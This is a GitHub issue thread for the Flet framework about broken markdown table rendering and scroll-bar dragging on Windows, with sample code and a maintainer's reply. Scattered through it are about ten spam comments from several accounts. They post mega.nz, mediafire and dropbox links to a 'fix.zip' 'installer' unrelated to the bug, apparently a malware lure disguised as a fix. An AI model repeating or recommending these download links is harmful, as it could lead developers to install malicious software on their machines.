### ISSUE TITLE
markdown table bug

### ISSUE THREAD

**Issue by BrentHuang** [flet-dev/flet#3868]
### Duplicate Check

- [X] I have searched the [opened issues](https://github.com/flet-dev/flet/issues) and there are no duplicates

### Describe the bug

table render error in ft.Markdown

### Code sample

<details open><summary>Code</summary>

```python
import flet as ft

md_content = """
# Markdown Example
Markdown allows you to easily include formatted text, images, and even formatted Dart code in your app.

## Titles

Setext-style

This is an H1
=============

This is an H2
-------------

Atx-style

# This is an H1

## This is an H2

###### This is an H6

Select the valid headers:

- [x] `# hello`
- [ ] `#hello`

## Links

[inline-style](https://www.google.com)

## Images

![Image from Flet assets](/icons/icon-192.png)

![Test image](https://picsum.photos/200/300)

## Tables

|Syntax                                 |Result                               |
|---------------------------------------|-------------------------------------|
|`*italic 1*`                           |*italic 1*                           |
|`_italic 2_`                           | _italic 2_                          |
|`**bold 1**`                           |**bold 1**                           |
|`__bold 2__`                           |__bold 2__                           |
|`This is a ~~strikethrough~~`          |This is a ~~strikethrough~~          |
|`***italic bold 1***`                  |***italic bold 1***                  |
|`___italic bold 2___`                  |___italic bold 2___                  |
|`***~~italic bold strikethrough 1~~***`|***~~italic bold strikethrough 1~~***|
|`~~***italic bold strikethrough 2***~~`|~~***italic bold strikethrough 2***~~|

## Styling

Style text as _italic_, __bold__, ~~strikethrough~~, or `inline code`.

- Use bulleted lists
- To better clarify
- Your points

## Code blocks

Formatted Dart code looks really pretty too:

```
void main() {
  runApp(MaterialApp(
    home: Scaffold(
      body: ft.Markdown(data: markdownData),
    ),
  ));
}
```
"""


def main(page: ft.Page):
    page.scroll = ft.ScrollMode.AUTO

    ref_md = ft.Ref[ft.Markdown]()

    page.add(
        ft.SafeArea(content=ft.ResponsiveRow(controls=[
            ft.Column(
                col=12,
                controls=[
                    ft.Stack(controls=[
                        ft.Row(controls=[
                            ft.Markdown(
                                value=md_content,
                                selectable=True,
                                extension_set=ft.MarkdownExtensionSet.GITHUB_WEB,
                                on_tap_link=lambda e: page.launch_url(e.data),
                                ref=ref_md,
                            ),
                        ]),
                    ], ),
                ],
            ),
        ], ), ), )


ft.app(target=main)
```

</details>

### To reproduce

run the code above

### Screenshots / Videos

<details open>
<summary>Captures</summary>

![image](https://github.com/user-attachments/assets/5f1e629c-6ab0-4fe0-858d-59e9a481bd44)

</details>

### Operating System

Windows

### Operating system details

windows10

### Flet version

0.24.0.dev3327

### Regression

I'm not sure / I don't know

### Logs

<details open><summary>Logs</summary>

```console
[Paste your logs here]
```

</details>

### Additional details

In addition, scrolling up and down with the mouse wheel is smooth, but dragging with the left mouse button and holding the scroll bar seems to fail. the example in https://flet.dev/docs/controls/markdown also has this scrolling problem.

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by ndonkoHenri** [comment]
Works on my end, both on web and desktop(macOS):
![image](https://github.com/user-attachments/assets/a890b6b0-6bbf-42f0-8ea9-05cbbfb446f7)

**Comment by NimaJafariComp** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by BrentHuang** [comment]
> Works on my end, both on web and desktop(macOS): ![image](https://private-user-images.githubusercontent.com/98978078/361236484-a890b6b0-6bbf-42f0-8ea9-05cbbfb446f7.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2Mzk2NjMsIm5iZiI6MTcyNDYzOTM2MywicGF0aCI6Ii85ODk3ODA3OC8zNjEyMzY0ODQtYTg5MGI2YjAtNmJiZi00MmYwLThlYTktMDVjYmJmYjQ0NmY3LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDAyMjkyM1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTZlZDMyZjk5NDI2NWNjZmZjNWU3YTkwZWMwMjQyYjU1OGNmNzIzMTVhNGQxYzBjYzdhMjM1NjliZjIzYjAzMmYmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.sKX4SIxUNd5F0wuXZ8b_9Y55GJ-R-genyw6G-2cdXGE)

I am on windows10, not macOS.

**Comment by BrentHuang** [comment]
In addition, scrolling up and down with the mouse wheel is smooth, but dragging with the left mouse button and holding the scroll bar seems to fail. the example in https://flet.dev/docs/controls/markdown also has this scrolling problem.

**Comment by BrentHuang** [comment]
Are you using my code? I had the same problem with macos. @ndonkoHenri

**Comment by ndonkoHenri** [comment]
Ah, I see the issue:. You need to set `expand=True` in the `Markdown` control.

**Comment by BrentHuang** [comment]
> In addition, scrolling up and down with the mouse wheel is smooth, but dragging with the left mouse button and holding the scroll bar seems to fail. the example in https://flet.dev/docs/controls/markdown also has this scrolling problem.

@ndonkoHenri  windows OS

**Comment by ndonkoHenri** [comment]
Can you share a video with the code from the docs?
